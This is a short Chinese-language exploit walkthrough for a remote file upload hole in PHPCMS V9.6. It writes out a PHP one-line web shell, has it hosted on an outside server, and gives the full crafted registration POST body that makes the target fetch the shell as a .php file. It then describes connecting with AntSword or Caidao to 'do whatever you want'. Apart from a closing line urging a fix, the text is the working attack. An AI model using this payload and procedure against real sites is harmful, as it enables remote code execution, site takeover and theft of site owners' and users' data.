经过亲自测试,本漏洞只针对phpcmx V9.6有效
首先我们在服务器上上传一个shell.txt一句话木门文件,内容为:
<?php @eval($_POST['wlsh']);?>
并且可以访问:http://www.baidu.com/shell.txt
然后在目标网站注册会员,打开burp,截断数据包,把post内容更改为
siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://www.baidu.com/shell.txt?.php#.jpg>&dosubmit=1&protocol=
利用repeater模块 查看回显包 得到shell地址。
通过重新POST后,就可以看到自己上传的木马文件,
然后用中国蚁剑或者菜刀连接后,就可以为所欲为了
这个漏洞危害很大,建议尽快修复!